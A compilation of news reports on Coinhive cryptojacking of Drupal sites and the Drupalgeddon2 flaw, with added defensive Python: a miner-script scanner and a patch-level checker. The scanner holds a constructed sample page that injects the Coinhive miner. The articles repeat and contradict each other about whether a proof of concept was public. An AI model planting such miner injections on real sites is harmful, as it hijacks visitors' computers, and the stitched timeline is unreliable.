Hackers have injected hundreds of websites running the Drupal content management system with malicious software used to mine the cryptocurrency monero.
This latest incident was uncovered by Troy Mursch, the security researcher behind the website Bad Packets Report. He wrote Saturday that more than 300 sites had been compromised by hackers who installed the browser mining software Coinhive, which mines the cryptocurrency monero, by exploiting a vulnerability in an outdated version of the Drupal content management system (CMS).
“Cryptojacking,” as similar attacks are called, has become a common problem in recent months. Whereas hackers used to favor ransom attacks – in which they would scramble victims’ data and demand ransoms in bitcoin or another cryptocurrency in order to decrypt it – they now increasingly infect websites with software that harnesses visitors’ computers to mine cryptocurrency on the attackers’ behalf.
Mursch told CoinDesk that while cryptojacking is not as overt as ransomware, it “continues to be a problem – especially for website operators.”
Affected sites include the San Diego Zoo, the National Labor Relations Board, the City of Marion, Ohio, the University of Aleppo, the Ringling College of Art and Design and the government of Chihuahua, Mexico. A full list of affected sites is available on this spreadsheet.
Visitors to affected websites may not even notice that their computers are running the cryptographic functions used to generate monero for hackers. The attacks slow users’ computers down, however, and can cause wear and tear on computers’ processors.
Not all Coinhive users are malicious, however. Salon, a news outlet, and UNICEF use the software to raise funds, but only run it with visitors’ permission.
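The injection described above is visible in the served HTML: the compromised pages load the Coinhive library and start a miner from an inline script. The following scanner is an added example, not code from the article or from Bad Packets Report; it assumes Coinhive's real script host (coinhive.com) and its public `CoinHive.Anonymous`/`User`/`Token` constructors, which the article does not spell out, and the two sample pages are constructed, not captured from any listed site. It flags both the external script include and the inline start call, so a site operator can run it over their own rendered pages to confirm a clean state after patching.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators of the Coinhive browser miner named in the article. The host and the
# CoinHive.* constructor names are assumed from the library's public interface;
# the article itself does not list them.
MINER_HOSTS = ("coinhive.com",)
MINER_API = re.compile(r"\bCoinHive\.(?:Anonymous|User|Token)\s*\(", re.IGNORECASE)


class _ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # accumulates the body of the inline script being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._buf is not None:
            self._buf.append(data)


def _host_matches(url, hosts):
    """True when the URL's host is one of `hosts` or a subdomain of one."""
    host = urlparse(url).netloc.lower().split(":")[0]
    return any(host == h or host.endswith("." + h) for h in hosts)


def scan_html(html):
    """Return a list of findings; an empty list means no miner indicator was seen."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        if _host_matches(src, MINER_HOSTS):
            findings.append("external miner script: " + src)
    for body in collector.inline:
        match = MINER_API.search(body)
        if match:
            findings.append("inline miner start call: " + match.group(0).strip())
    return findings


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><head><title>Example site</title>
<script src="/sites/default/files/js/jquery.js"></script></head>
<body><script>var tracker = {page: 'home'};</script></body></html>"""

INJECTED_PAGE = """<html><head><title>Example site</title>
<script src="/sites/default/files/js/jquery.js"></script>
<script src="//coinhive.com/lib/coinhive.min.js"></script></head>
<body><script>
var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER', {throttle: 0.2});
miner.start();
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name + ":", scan_html(page) or "no miner indicators")
```

Feed `scan_html` the HTML as a browser would receive it (after any server-side templating), since the injected tag on the affected Drupal sites lived in the rendered page rather than in a static file.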
After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.
The vulnerability was discovered by the Drupal developer Jasper Mattsson.
Both Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates, and experts called it Drupalgeddon2.
The Drupal development team released the security update in time to address CVE-2018-7600.
After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.
A week after the release of the security update, the experts at security firm Check Point, along with Drupal experts at Dofinity, analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.
After the publication of the report, the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”
Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.
Over the weekend, several security firms observed that threat actors had started exploiting the flaw to install malware on vulnerable websites, mainly cryptocurrency miners.
The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.
“Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit.” reads the analysis published by the SANS.
“Ever since then, we are seeing waves of exploit attempts hitting our honeypots.”
A thread on the SANS ISC Infosec forums confirms that attackers are exploiting the Drupalgeddon2 flaw to install the XMRig Monero miner. Attackers also use it to drop and execute other payloads, including a script to kill competing miners on the infected system.
According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts, cryptocurrency miners and backdoors.
The experts associated one of the observed campaigns, which delivered XMRig, with a cybercriminal gang that exploited the vulnerability CVE-2017-10271 in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.
According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempts to drop and run cryptocurrency miners on the vulnerable systems.
“To this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets.” states the analysis published by Imperva.
“Also, most of the attacks originated from the US (53%) and China (45%).”
While experts speculate that the number of attacks could continue to increase in the next weeks, site admins must update their CMS to Drupal 7.58 or Drupal 8.5.1.
The Drupal development team has fixed the Drupalgeddon2 vulnerability that could be exploited by an attacker to take over a website.
A few days ago, Drupal Security Team confirmed that a “highly critical” vulnerability, tracked as CVE-2018-7600, affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.
The vulnerability was discovered by the Drupal developer Jasper Mattsson.
Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates.
Now the Drupal development team has fixed the vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing a URL.
The Drupal CMS currently runs on over one million websites; it is the second most popular content management system behind WordPress.
Website administrators should immediately upgrade their sites to Drupal 7.58 or Drupal 8.5.1.
The flaw was dubbed Drupalgeddon2 after the CVE-2014-3704 Drupalgeddon security vulnerability, discovered in 2014, that was exploited in numerous successful attacks in the wild.
The good news is that, at the time of writing, there is no public proof-of-concept code available online.
The Drupal security team declared that it was not aware of any attacks exploiting the Drupalgeddon2 vulnerability in the wild.
“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.” reads the security advisory published by Drupal.
“The security team has written an FAQ about this issue. Solution:
Upgrade to the most recent version of Drupal 7 or 8 core.
- If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
- If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)”
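The advisory's remediation is a version threshold: 7.x must reach 7.58, 8.5.x must reach 8.5.1, and the unsupported 8.3.x/8.4.x branches need their branch-specific security updates. The checker below is an added example, not the Drupal project's own tooling or the advisory's; it assumes the standard core layout in which Drupal 7 records its version in `includes/bootstrap.inc` (`define('VERSION', ...)`) and Drupal 8 in `core/lib/Drupal.php` (`const VERSION = ...`), neither of which the advisory states. The two source excerpts are constructed. A pre-release build such as `7.58-dev` is deliberately treated as older than the fixed release, so it is still reported as needing the update.

```python
import re
from pathlib import Path

# Fixed releases named in the advisory. Keys carry a trailing 1 for a real release
# and 0 for a pre-release suffix, so "7.58-dev" sorts below "7.58".
FIXED_7 = (7, 58, 1)
FIXED_8_5 = (8, 5, 1, 1)

# Where core stores its version string (assumed standard Drupal layout):
#   Drupal 7: includes/bootstrap.inc  ->  define('VERSION', '7.57');
#   Drupal 8: core/lib/Drupal.php     ->  const VERSION = '8.5.0';
VERSION_FILES = ("includes/bootstrap.inc", "core/lib/Drupal.php")
VERSION_RE = re.compile(
    r"(?:define\(\s*['\"]VERSION['\"]\s*,\s*|const\s+VERSION\s*=\s*)['\"]([^'\"]+)['\"]"
)


def parse_version(php_source):
    """Extract the VERSION string from Drupal core PHP source, or None if absent."""
    match = VERSION_RE.search(php_source)
    return match.group(1) if match else None


def version_key(version):
    """'8.5.1' -> (8, 5, 1, 1); '8.5.1-dev' -> (8, 5, 1, 0) so pre-releases sort lower."""
    match = re.match(r"(\d+(?:\.\d+)*)(.*)", version)
    if not match:
        raise ValueError("unparseable Drupal version: " + version)
    numbers = tuple(int(x) for x in match.group(1).split("."))
    return numbers + ((0,) if match.group(2) else (1,))


def assess(version):
    """Return (vulnerable, advice) for CVE-2018-7600; vulnerable is None if unknown."""
    key = version_key(version)
    major = key[0]
    if major == 7:
        if key >= FIXED_7:
            return (False, "Drupal 7.58 or later: CVE-2018-7600 fixed")
        return (True, "upgrade to Drupal 7.58")
    if major == 8:
        if key[:2] == (8, 5):
            if key >= FIXED_8_5:
                return (False, "Drupal 8.5.1 or later: CVE-2018-7600 fixed")
            return (True, "upgrade to Drupal 8.5.1")
        if key[:2] > (8, 5):
            return (False, "newer than the 8.5 line; confirm against the current advisory")
        # 8.0.x through 8.4.x: unsupported branches, all affected.
        return (True, "unsupported 8.x branch: upgrade to Drupal 8.5.1, or apply the "
                      "branch security update if one was issued for it")
    if major == 6:
        return (True, "Drupal 6 is end of life; contact a D6LTS vendor")
    return (None, "unrecognised major version %d" % major)


def check_site(docroot):
    """Locate the core version file under a Drupal docroot and assess it.

    Returns (version, vulnerable, advice); version is None when nothing was found.
    """
    root = Path(docroot)
    for rel in VERSION_FILES:
        path = root / rel
        if path.is_file():
            version = parse_version(path.read_text(errors="replace"))
            if version:
                return (version,) + assess(version)
    return (None, None, "no Drupal core version file found under " + str(root))


# Constructed excerpts of the two core files (not real project source).
SAMPLE_D7 = "<?php\n// constructed excerpt\ndefine('VERSION', '7.57');\n"
SAMPLE_D8 = "<?php\nclass Drupal {\n  const VERSION = '8.5.0';\n}\n"

if __name__ == "__main__":
    for src in (SAMPLE_D7, SAMPLE_D8):
        v = parse_version(src)
        print(v, assess(v))
    for v in ("7.58", "8.5.1", "8.5.1-dev", "8.4.5", "6.38"):
        print(v, assess(v))
```

Run `check_site("/var/www/html")` (or whatever the docroot is) on each host; the version string alone is not proof of a clean system, since an already-compromised site stays compromised after the upgrade, so pair it with a review of the webroot for the PHP backdoors and miner scripts described above.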
Patching the websites is essential; the popular expert Kevin Beaumont noticed that the Drupal homepage was taken down for half an hour to address Drupalgeddon2.
The Drupal team also issued security patches for the 6.x versions, which were discontinued in February 2016.
“This issue also affects Drupal 6. Drupal 6 is End of Life. For more information on Drupal 6 support please contact a D6LTS vendor.” continues the advisory.